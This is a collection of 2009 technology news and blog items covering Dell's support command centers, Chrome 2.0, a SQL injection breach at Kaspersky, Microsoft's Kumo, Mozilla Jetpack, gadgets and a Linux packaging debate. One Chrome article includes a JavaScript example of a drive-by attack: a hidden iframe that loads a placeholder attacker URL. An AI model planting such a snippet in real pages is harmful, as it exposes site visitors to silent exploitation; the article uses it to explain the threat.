Allen is in charge of Dell’s five worldwide Global Command Centers, around-the-clock operational centers where technicians are constantly monitoring things like flight delays, traffic jams, weather conditions or even a special event that might impact the company’s ability to handle a support call.

Allen gave me a tour of the facility during a day-long visit this week to the company’s main campus just outside Austin, Texas. As I met with folks throughout the day, there was one thing I continued to hear: tech companies today have very similar offerings from a technology and equipment perspective. It takes something different – like a global command center to make sure that service contracts are upheld – to make a company stand out against its competitors.

When customers rely on Dell’s servers and other equipment to keep their data centers running or their e-commerce sites powered, they need quick results from Dell’s service teams when problems arise, Allen said. The last thing a customer wants to hear is that a part is out of stock or that flight delays out of Chicago will delay delivery of replacement equipment. His team is constantly playing a game of chess - managing vendors, parts deliveries, technician dispatches and more - to make sure that these sort of problems don’t get in the way of solving the customer’s problem.

The command centers are quite a sight to see. They are rows of workstations, arranged stadium-style so that everyone has a clear line of sight to a wall full of screens. Live broadcasts of the Weather Channel and CNN play on some of them. Another has Google Earth fired up, offering overlays of everything from traffic conditions heading to Los Angeles International Airport to the path of a hurricane barreling its way up the East Coast and the time until it hits. Other screens offer big-picture or detailed looks at the current support tickets.

On any given day, anything can happen to spark a flurry of activity in the command center. But in most cases, the work being done from the center is proactive, not reactive. Say, for example, the President will be attending a fundraiser in downtown Indianapolis. From a security standpoint, that’s an event that will likely result in road closures and traffic disruptions – something that could keep the UPS driver from reaching a Dell customer.

Armed with that sort of information, technicians in the center can reach out to those customers, inform them of the upcoming event and develop a contingency plan in the event that the customer encounters any problems during that time.

“When service goes down and it’s affecting people, we use every tool to get the problem fixed as fast as possible,” Allen said. “There’s no room for error.”

(Jason Allen, Operations Manager of the Global Command Center, points out details from a customer support ticket being reviewed by technicians.)

First look: Google Chrome 2.0 - Fast but lacking features

Google has released Chrome 2.0. The speed-demon browser gets an additional kick of speed, a few more features, and a load of bug fixes.

First, let’s look at the speed side of things. Google’s Chrome browser was already fast, but the 2.0 update loads JavaScript-heavy web pages about 30% faster than version 1.0. Benchmark tests I’ve run seem to support this claim; in fact, when version 2.0 is compared against version 1.0 using Google’s V8 benchmark, the newer browser is twice as fast.
So, there’s plenty of speed available. But what about features?

Well, for those who like an all-singing, all-dancing browser, Google’s Chrome has always been a poor choice because, while the browser packed plenty of power, it was very basic. Chrome 2.0 is no different.

Here are some of the most significant newly added features to Chrome 2.0:

  • Ability to delete thumbnails from new tab page
  • Full page zoom
  • Full screen mode (by pressing F11)
  • Autofill for web forms

Nothing to write home about! Still, I use Chrome regularly because I like the speed and love the stability.

Then there are the bug fixes. More than 300 of them, according to Google.

If you are a Chrome user, the browser will automatically update when run. If not, head over to the Google Chrome download page.

For Mac and Linux users, there’s still no Google Chrome for you.

Saturday, May 23, 2009

Kaspersky Red-Faced Over SQL Injection Hack

A group of hackers who were apparently not advanced enough to take full advantage of their mischief nevertheless managed to embarrass security firm Kaspersky. They may have been looking to build their hacker creds when they breached a database under the firm's protection by taking advantage of a SQL injection vulnerability.

A team of hackers exploited a SQL injection vulnerability to gain access to a customer database protected by security company Kaspersky. It appears the attack did not compromise any data, according to Roel Schouwenberg, a Kaspersky senior antivirus researcher. However, it certainly dealt a blow to the company's reputation.
"A Romanian hacker team found a vulnerability in a new site we launched in the U.S.," Schouwenberg told TechNewsWorld. "That vulnerability allowed them to to get some access to that part of the site. Fortunately, no data has been compromised -- but if the hackers had been more advanced, they could have gotten access to 2,500 email addresses and activation codes for new products."
The hackers' motives for carrying out the attack are unclear.
Insufficient Notice
"They said they alerted us to the problem before making it public," said Schouwenberg. "They did -- but only by an hour."
They sent an email Saturday evening, Moscow time, to Kaspersky, he said.
The attack was likely more about the hackers' desire for 60 minutes of fame than anything else, he speculated.
Kaspersky developed the compromised site with a third party, Schouwenberg pointed out. "Unfortunately, there was some vulnerability in the code written by the third party that slipped by our review process. We could have done a better job in catching that, for our part."
As part of its clean-up efforts, Kaspersky has retained Next Generation Security Software's David Litchfield to conduct an independent audit and security risk analysis. The results, expected within 24 to 48 hours, will be posted on the company's Web site.
Previous internal reviews and audits had turned up vulnerabilities, "but they were never exploited in the wild," Schouwenberg said.
Could Happen to Anyone?
Kaspersky, no doubt, is mortified by the incident. (Schouwenberg readily acknowledged the lapse was bad, but also pointed out that the company's core competency is antimalware). Certainly, the breach is enough to cast doubt not only on Kaspersky's security bona fides, but also on the industry as a whole.
Companies that rely on the Internet security industry to protect their own operations and customers have reason for concern, suggested Rohyt Belani, CEO of Intrepidus Group. "SQL injections are the most deadly, and they are very difficult to protect against," he told TechNewsWorld. "This could have happened to almost anybody."
Unless a coder is highly attuned to the security implications, it is easy to write an application that could be vulnerable to such an attack, he said.
Take an online mortgage application, for example. The field that requests the name should be explicitly limited to accept only alphabet characters. However, a developer might not do this, Belani said, because names can require other characters, such as apostrophes.
"Attackers know that that particular field becomes part of a database query in the back end system -- so they inject SQL characters into that field, which can then modify the flow in the back end," he explained. If the attack is successfully executed, portions of the database can be shown back to the user or corrupted in certain ways.
Need to Test
Testing is the best protection.
"Here's another example of companies not testing their Web applications before deploying them out there for customers -- and hackers," Mandeep Khera, CMO for Cenzic, told TechNewsWorld.
This incident highlights a problem Cenzic has seen with other attacks -- which is that companies often don't find out they are being hacked for a long time -- and many times, they discover it only accidentally.
"Our advice to anyone who has a Web site with forms is to start testing those for vulnerabilities," he said, "and even if you can't fix all the vulnerabilities right away, at least make it difficult for those hackers who are going for the low-hanging fruit.

Can a Semantic Kumo Wrestle Google to the Mat?


In the realm of search, Microsoft trails far behind Google and Yahoo, two engines that deliver search results mainly by matching keywords. Can adding a little semantic technology give Microsoft's search engine a better idea of what's on the searcher's mind -- and thus attract more users? Redmond is expected to deliver such a product, known as "Kumo," in the coming weeks.


In about two weeks, Microsoft is expected to launch Kumo, its sort of old, sort of new search engine.
Microsoft regards Kumo as its Google (Nasdaq: GOOG) killer, according to analyst Rob Enderle of the Enderle Group, and the software company is banking heavily on it despite deep internal divisions over the project.
Kumo will reportedly take over Microsoft's Live Search and incorporate semantic Web search capabilities, which could be the next wave in search engine technology.
However, in some ways, the semantic Web is already creeping up on us -- we just don't know it yet.
What Is Kumo?
Kumo is a combination of Microsoft's Live Search search engine and semantic Web technology the vendor acquired when it bought Powerset in July 2008, according to semantic Web expert Michael K. Bergman, CEO and cofounder of Structured Dynamics.
"I have looked at what's been released with Kumo so far, and I'm quite familiar with Powerset," he told TechNewsWorld.
San Francisco-based Powerset offered search and natural language capabilities based on an exclusive license it secured for natural-language processing technology from Xerox's (NYSE: XRX) Palo Alto Research Center in early 2007.
Microsoft made the purchase after walking away from negotiations to buy Yahoo (Nasdaq: YHOO) earlier in the year.
Microsoft declined to comment for this story. "Microsoft does not comment on rumors or speculation," Waggener Edstrom Account Coordinator Katy Spaulding told TechNewsWorld in response to an email request.
The Google Killer?
Microsoft has long lagged behind Google and Yahoo in the search engine marketplace. It has a powerful incentive to challenge the market leaders: A strong search engine would help its online ads business.
To that end, it has shaped Kumo as its weapon against Google in the search engine war.
"Kumo was designed from the ground up to be a Google killer," Enderle told TechNewsWorld. "Microsoft put a lot of effort into it."
What does Google think about this new kid on the block?
"Search is a highly competitive industry, and we welcome competition that stimulates innovation and provides users more choice," Google spokesperson Nate Tyler told TechNewsWorld.
The project may be a costly one for Redmond. The amount of time and money Microsoft has spent on Kumo has caused deep divisions within the vendor's management, Enderle said.
"I understand a lot of people on the Microsoft board want them to stop this project," he added. "They want Microsoft to focus on things they do well and not waste any more money."
Talks With Yahoo Resume
Could that division be why Microsoft has reportedly resumed talks with Yahoo recently? Is Microsoft looking again to buy Yahoo's search engine?
Not likely, Enderle said. "We don't really know what they're talking to Yahoo about."
Buying up Yahoo's search technology now could prove troublesome, he noted.
"You wouldn't want to throw together a lot of technologies from different vendors in the hope that they're going to work," Enderle explained. "You'll spend all your time trying to integrate these separate products that weren't built with the idea of integrating with anything else."
The Semantic Web
The semantic Web provides a common framework that lets data be shared and reused across applications, enterprises and communities, according to W3C, an international Web standards consortium.
The semantic Web is essentially already here, and Kumo is a part of it, Structured Dynamics' Bergman said. "Google's doing a lot there, but very quietly."
Basically, the semantic Web adds structure to Web searches. Users will see that added structure in features such as search results grouped in the center of the page and a hierarchical organization of concepts or attributes in the left-hand column, which is what Kumo appears to be doing.

Mozilla Straps On Jetpack for Firefox Devs


Jetpack is Mozilla's new API for developers to create add-ons for the Firefox Web browser. Currently, many Firefox add-ons work through an extension called "Greasemonkey," which some fear may disappear if Jetpack takes off. Jetpack, however, has its advantages in terms of compatibility and the ability to activate new features without a browser restart.

Mozilla's Wednesday call for developers to participate in its Jetpack project is the latest salvo in the ongoing war of the Web browsers.
Jetpack is an open source application programming interface (API) that will let users create add-ons for Mozilla's Firefox browser using the Web technologies they already know.
Google (Nasdaq: GOOG) has launched a project to add extensions to its Chromium open source code that closely follows Mozilla's direction in some respects.
Meanwhile, some developers are concerned that the launch of Jetpack could mean Mozilla will kill off Greasemonkey, a Firefox extension that lets users customize the way Web pages look and feel.
About Jetpack
Jetpack is an exploration in using Web technologies such as HTML, CSS and JavaScript to create add-ons for the Firefox browser, according to Mozilla.
It will let users add new features without having to worry about compatibility and without having to restart their browsers, as is currently required.
"Jetpack is an open source platform on top of which anybody that can write a Web page can now enhance the browser," Asa Raskin, head of user experience at Mozilla Labs, told LinuxInsider. "We want to make the Web better and make it as personal as it can be."
The current Jetpack release version is 0.1, which means it needs a lot more work. Mozilla intends to tweak and fine-tune the project with feedback from developers, especially on the API design.
"We ask ourselves, what are the cool innovations we can't see around the corner that are coming, because all of a sudden there are new communities -- students, anyone who can create a Web page -- that are making the open Web a better space," Raskin said.
Staving Off the Competition
The timing of Mozilla's announcement -- one week before Google's I/O Developer Conference, to be held in San Francisco May 27 and 28 -- is no coincidence, according to Laura DiDio, principal at research firm ITIC.
"It's an attempt to fight off Google Chrome and Internet Explorer 8," she told LinuxInsider.
"Is it a pre-emptive strike? Yes," DiDio said. "Mozilla's more concerned about Google than Microsoft."
The 800-Pound Googorilla
There's good reason to fear Google. The Internet giant released version 2.0 of its Chrome browser to the public on Thursday.
In addition to being faster, Chrome 2.0 is more stable; has an improved New Tab page; offers full-screen mode; and has Form Autofill.
Google has fixed more than 300 bugs that caused crashes since it launched the browser eight months ago, the company said.
Extensions to Chrome
Google is also working on extensions to Chromium, the open source project whose code Chrome is built on.
It is closely following Mozilla's lead in extensions. "Most extensions should be able to load in place without forcing a browser restart or even a page reload when they are installed," the Chromium developer documentation for extensions states.
As is the case with Mozilla's Jetpack, Google wants Web developers to use JavaScript, HTML and cascading style sheets (CSS) to create Chromium extensions.
Google wants Chromium extensions to cover Greasemonkey-like use cases. One planned API will consist of user scripts that can read and modify Web pages by injecting JavaScript into them.
Monkey Gone to Heaven?
Some Mozilla users have begun voicing fears that Jetpack will kill off Greasemonkey.
"How is this any different from Greasemonkey?" asked Casey in a comment on the Mozilla Jetpack blog. "Aren't you just risking taking development resources away from them and their community when they already have something great in place?"
Greasemonkey is not a Mozilla project, Raskin pointed out, and he sees no conflict between Greasemonkey and Jetpack.
"Greasemonkey is an awesome Firefox extension," Raskin said, "but it's about modifying pages you're looking at, whereas Jetpack lets you modify the browser."

Chrome 2.0 Juices Up JavaScript

A new version of Google's Chrome browser boasts faster speed by way of improvements to V8 and WebKit. Other new features include full-screen mode and autofill. A faster JavaScript experience, however, could also pave the way for faster malware, since the language is a favorite among scammers. Google contends Chrome is no less safe than other browsers.
Google (Nasdaq: GOOG) on Thursday revealed Chrome 2.0, a purportedly faster and more feature-filled version of the search giant's Web browser.
The extra speed comes from an update to its V8 JavaScript engine and from a new version of the open source WebKit rendering engine.
However, Chrome's speed advantage may soon be overshadowed by rivals. Mozilla, for example, is expected to release the final version of Firefox 3.5 soon.
Also, speeding up JavaScript may lead to security problems.
New Features in Chrome 2.0
Chrome 2.0 is faster than Version 1, released eight months ago, because it runs JavaScript faster, according to Google.
It also incorporates some of the features beta testers requested the most. One is an improved new tab page that lets users remove thumbnails.
Another is a new full-screen mode, and a third feature is form autofill.
However, full-screen mode and form autofill are both features other browsers have had for a while (think deadly rivals Internet Explorer and Firefox).
Why Chrome 2.0 Works Faster
The V8 JavaScript engine is open source technology developed by Google and written in C++. It increases performance by compiling JavaScript to native machine code before execution, rather than compiling it to bytecode or interpreting it.
It also employs optimization techniques such as inline caching, which remembers the result of a previous method lookup directly at the call site (the point in the code where a function is called). These optimizations let JavaScript applications approach the speed of a compiled binary.
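As a rough illustration (a conceptual sketch, not actual V8 internals), inline caching pays off when the objects reaching a call site always have the same shape, so the engine can look up a property's location once and reuse it:

    // Conceptual sketch of a call site that inline caching speeds up.
    function magnitude(point) {
      // point.x and point.y are property lookups made at this call site.
      return Math.sqrt(point.x * point.x + point.y * point.y);
    }

    // Every object passed in has the same {x, y} shape, so after the
    // first call the engine can cache where x and y live and skip the
    // full lookup machinery on the remaining iterations.
    var total = 0;
    for (var i = 0; i < 100000; i++) {
      total += magnitude({ x: i, y: i + 1 });
    }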
Will Firefox Pose a Speed Challenge?
Chrome 2.0 may not hold its speed advantage very long, however -- Mozilla will issue the release candidate (RC) of Firefox 3.5 in the first week of June, according to Mozilla director Mike Beltzner's post on the company's blog. That new version of the browser could be sped up too.
"It's pretty common competition among the browsers -- they always want to be fastest," Randy Abrams, director of technical education at security software vendor ESET, told TechNewsWorld.
Mozilla did not respond to requests for comment by press time.
Speed Kills?
Supercharging JavaScript may not always result in a faster user experience.
"I'm not sure how big an impact speeding up JavaScript is going to make unless you're using some huge JavaScript application," ESET's Abrams said.
Speeding up JavaScript could also speed up the malware based on the language.
"Malware based on JavaScript will run faster," Abrams said. "JavaScript is the vector of choice for drive-by attacks."
In a drive-by attack, a Web page containing malicious code downloads that code onto visitors' computers without their knowledge or permission, and without the user having to click on any links.
Malware authors use JavaScript in almost 90 percent of Web pages that contain malicious script, according to Stephan Chenette, manager of security at Web security software vendor Websense.
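The typical pattern researchers describe is a short snippet injected into a compromised page that silently pulls in an attacker-controlled URL. Here is a defanged sketch of that pattern; the URL is a placeholder, and the snippet does nothing beyond illustrating the shape of the attack:

    // Defanged sketch of the classic drive-by injection pattern: an
    // invisible iframe quietly loads an attacker-controlled page, which
    // then probes the visiting browser for exploitable flaws.
    // (Placeholder URL; shown only to illustrate the technique.)
    document.write(
      '<iframe src="http://attacker.example/exploit" ' +
      'width="0" height="0" style="visibility:hidden"></iframe>'
    );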
Hard to Scratch Chrome?
It's not necessarily open season on users of Google Chrome, since it uses a sandboxing model that makes it difficult to hack, Google spokesperson Eitan Bencuya told TechNewsWorld.
Sandboxing means isolating code so that it cannot interact with the operating system or applications on a user's computer.
Still, ESET's Abrams thinks sandboxing is not enough. "Chrome does have some protection other browsers don't, in that it sandboxes individual tabs," he said. "That might protect the operating system itself, but it's not going to do anything to protect you against cross-site scripting or clickjacking."
Sandboxing offers only limited protection, he warned. "It's only effective if you go to each different site in a different tab. Otherwise, the old data will be accessible when you use the same tab to click on a new site."
Google contends Chrome is no less safe than other browsers. "All of the topics you mention are tough issues to fight, and they affect all browsers," Bencuya said.

Monday, May 18, 2009

Unboxing the 22-inch iZ3D 3D Monitor

Opening a brand new piece of electronic kit is like Christmas to me, so I decided to share my glee with you. Yes, it’s true: You have the privilege of seeing yours truly unboxing and depackaging the robust 22-inch 3D monitor from iZ3D. Pics and video after the jump.

If the mere unboxing of this monitor is all the convincing you need, it’s got a $50 discount at Newegg right now.

Apple, iPhone King of Smartphones

Proving once again its chiefdom and absolute head-honcho position at the top of the smartphone class, the Apple iPhone came in first in a JD Power and Associates survey about how satisfied customers have been with their life-management devices. Outstripping other “competitors” like HTC and RIM, the iPhone is king, at least in customers’ minds, on a variety of different features. Details after the jump.

Apple got “among the best” scores on design, ease of operation, features and OS. However, the iPhone tanked on battery life. HTC also lost some traction on battery life, while RIM’s BlackBerry was ranked among the best in battery life on cell phones. Life’s Good for LG, which topped customers’ minds in non-smartphones (those regular phones that don’t do much but call people – how dull), but we won’t hold that against them. Sony Ericsson wasn’t far behind LG in the regular cell phone class.

In other random facts, the JD Power study also pointed out that more and more smartphone users are electing to rely entirely on mobile communications, getting rid of their landlines. Also, one-third of traditional cell phone users said they would like an upgrade in features – mostly GPS capabilities – in their next phone. There you go: Looks like the Garmin-Asus Nuvifone will have a market.

Sony Ericsson Hints at a PlayStation Phone

In the race to make the XenoProduct, rumors flutter to and fro about consoles becoming a home PET scanner and dessert topping, and your controller a Bass-O-Matic and cat o’ nine tails. Rising to the top yet again is the rumor of a PlayStation phone.

Sony Ericsson jefe Hideki Komiyama recently told The Financial Times that, as part of his recovery plan for Sony Ericsson, leveraging Sony’s brand recognition in the gaming market would be a good idea, and that a PlayStation phone built on SE’s current Walkman and Cybershot handsets “could happen.”

Is this a leak or wishful thinking? It seems a little late to start working on a PlayStation phone, doesn’t it?

Star Trek Review–Sure Feels Good to be a Trekkie

I really do love Star Trek. I can’t, however, call myself a full-fledged Trekkie. If Trekkies were ranked according to Starfleet’s table of ranks, I’d probably only be a lieutenant junior grade, a provisional lieutenant commander at best. But compared to the average civvie, I do concern myself with the details, background info and plot consistency – the lore, really – of the Star Trek universe. That’s why, despite a few awkward moments, I’m genuinely surprised and pleased to have loved the hell out of J.J. Abrams’ Star Trek: The College Years.

The Latest Acer Aspire Boasts Better Specs

The latest Acer Aspire One 571 (not to be confused with the already-released, same-old-specs Acer Aspire One 751) boasts upgraded specs not typical of netbooks – which is something to really get excited about.

The 571 looks the same on the outside, but it’s what’s inside that counts. The 10.1″ screen has a 1280×720 resolution and a 16:9 aspect ratio. That’s HD on a netbook. To make HD possible, Acer has added a Quartics q1721 Multimedia Coprocessor that lets the netbook decode H.264 – aka HD – video at the aforementioned resolution.

Acer has also added a Vmedia optical drive on the left side of the netbook. No word on price or dates, but you can check out our review of the best netbooks on the market while you’re waiting.

Harry Potter and the Half-Blood Prince Video Game Release Date

Harry Potter and the Half-Blood Prince hits theaters July 15th, but you won’t have to wait that long to explore Hogwarts and its environs. Below you’ll find not only more info – you’ll also have to fight off a horde of Inferi!

Yeah I know that was lame.

The video game version of Harry Potter and the Half-Blood Prince comes to PS2, PS3, 360, Wii, PSP and DS, as well as both PCs and Macs, on June 30th. They even say it comes to “… mobile devices,” so does that mean iPhones, BlackBerries and/or G1s? Or maybe just Windows Mobile devices?

You’ll be able to perform the usual assortment of wizardry and witchcraft, but there are a few new things in Half-Blood Prince, like managing Ron Weasley’s love life and studying potionology. I hope there will be more interactive environs in this one, mainly to satisfy my destructive desires.

Kaspersky Internet Security

Kaspersky Internet Security 9.0.0.413 Beta is an antivirus and security product from kaspersky.com with a 5-star SoftSea rating. The Kaspersky Internet Security technological prototype represents a new-generation platform for applications designed for comprehensive protection of personal computers and workstations. Uniting the substantially improved capabilities of Kaspersky Lab's version 5.0 protection products with the company's latest technological innovations, Kaspersky Internet Security delivers complete protection of a computer against all sorts of electronic threats: malicious programs, hacker attacks and spam. The software is licensed as a free trial, so you can download it and try it before you buy; to keep using it beyond the trial, you'll need to purchase the full version.

The Great Debate Over a Linux Standard Package Format

Does FOSS need a common packaging framework? It's an unnecessary waste of time, argued opponents. It will save developers loads of time, insisted proponents. It's irrelevant, chimed in Slashdot blogger hairyfeet: "The problem with Linux is NOT the packages, it is the fact that trying to develop for Linux is like trying to hit a dartboard with a live bumblebee."
Conversation on the Linux blogs tends to be either outraged and angry (probably most common) or jubilant and enthusiastic (generally when Redmond is taken down a notch or two). In the last few days, however, some of it has been positively mournful.

The cause? Widely revered reverse engineer Fjalar Ravia -- more commonly known by his pseudonym "Fravia+" -- passed away on Sunday, May 3, 2009.

In April, Fravia+ posted a farewell message on his blog, announcing that he had just weeks to live after battling cancer for more than two years.

Jun Auza called attention to the post on his blog, prompting Linux geeks far and wide to pause and reflect.

'Big Respect to a Great Coder'

"Fravia+ ... perhaps one of the most influential individuals I've had the chance to encounter on the internet," wrote Anonymous in the comments on Auza's post.

"His many websites are a gigantic source of wisdom and of useful information. I've studied reverse engineering through him, his tutorials and challenges -- all in the hope of becoming a better programmer and person," Anonymous added. "Thanks Fravia+ for all the information, the time was well spent."

Similarly: "Big respect to a great coder and someone that freed a lot of information," added HexJam.

'His Work Will Continue'

"Perhaps this is a good time to take a collective pause and consider that there may be more to life than just tech stuff," Montreal consultant and Slashdot blogger Gerhard Mack offered.

On the other hand: "It is sad when someone who contributes so much to openness departs, but his work will continue," blogger Robert Pogson told LinuxInsider by email. "It angers me that M$ and others make such an effort to be closed that we have to spend our lives fighting it."

'Nobody Needs a Unified Format'

Speaking of the battle with Redmond -- and strategies for victory -- an interesting conversation arose when TuxRadar recently asked the question, "Do we need a standard package format?"

A virtual stampede of more than 120 comments greeted the question on TuxRadar before it was picked up on Digg as well.

"No," wrote person-b in the comments following the TuxRadar post. "Nobody needs a unified format. Everybody should just use 'alien' to convert packages to their native format if the owners can't be bothered to package it properly."

'Would It Make Any Difference?'

On the other hand: "Absolutely," shot back geekyBodhi. "Not only will it be simpler for users, it'll also save app developers and packagers loads of time."

Then again: "Would it make any difference?" asked Martin from Sweden. "I think the solution is things like Linux Standard Base and then a user friendly front end to 'alien', as well as using a solution like PackageKit besides the distributions' other packaging tools."

Not long ago, we here at LinuxInsider investigated a similar question regarding the existence of multiple distros. Now, given the divided nature of opinions on this one, we couldn't resist digging a little deeper.

'I Don't Think It Should Be RPM'

"I think we need a standard package format," Mack told LinuxInsider.

"I don't think it should be RPM," he added. "On the other hand, it might just end up that RPM-based distros will become yesterday's news. I had a 'nothing on my desktop but Fedora' coworker make the jump after he got used to apt-get on our servers."

The case for standard package formats is strongest "when one is trying to woo proprietary software developers to a Linux distro," Chris Travers, a Slashdot blogger who works on the LedgerSMB project, told LinuxInsider.

"If you build open source More about open source software and your software is valuable, people will package it for whatever distribution they want to use it on," Travers explained. "So, the first question we have to ask is, do we need closed source software on Linux? Do we care enough to make it easy to make such software packages by vendors?"

'Lightweight Work'

A second argument that's sometimes advanced is that "packaging for many distributions consumes developer time needlessly," Travers noted. "The fact, however, is that testing still needs to be done on the target distro, and this is one of the packager's jobs."

Packaging is also "somewhat lightweight work," he added, "but it requires knowledge of how the software should be correctly implemented on a specific distro" and so provides "opportunities for community members of open source projects to get involved," he said.

In short, "I don't think that a common packaging framework would necessarily be particularly helpful to open source projects," Travers concluded.

Lack of Support

At least one blogger saw the question in an entirely different light.

"The problem with Linux is NOT the packages, it is the fact that trying to develop for Linux is like trying to hit a dartboard with a live bumblebee," Slashdot blogger hairyfeet told LinuxInsider via email.

To illustrate: "A friend of mine brought over a scanner the other day," hairyfeet recounted. "It was released nearly 9 years ago, but you know what? It works in XP SP3. That is because the driver for Win2K -- released nearly 9 years ago -- still worked. I run games and programs from the Win98 era. That is 11 years and it still works on XP SP3.

"Now compare that to Linux," hairyfeet added. "Does anyone honestly think they can use a driver from even 3 years ago in Linux? Or that getting a program from even 5 years ago working wouldn't be an exercise in frustration?"

That is why Linux "isn't getting market share," hairyfeet explained. "It isn't the packages, it isn't the lack of exposure, it is simply the fact that hardware manufacturers by and large refuse to support it."

'Linux Simply Isn't Stable'

There's also good reason for that refusal, he asserted. "It is because Linux simply isn't stable as a platform, and if it keeps going like this it never will be.

"If I am a hardware manufacturer, competing with all the other manufacturers, I have two choices: I can write three drivers -- Win98/ME, Win2K/XP and WinVista/7 -- and have every single Windows OS covered from 1998 to 2011 at least," he said. "If I write for Linux, exactly WHICH Linux? Red Hat or Debian based? Stable, testing, long term support? How long will my customers be able to use the driver I release today before it no longer functions?"

In short, "If Linux is going to get the crucial hardware manufacturers to support it, then like Windows they need to be able to release a driver today and have it work years and years into the future without maintenance," he concluded. "To truly succeed, Linux needs to have a truly stable long term underlying framework that the manufacturers can target."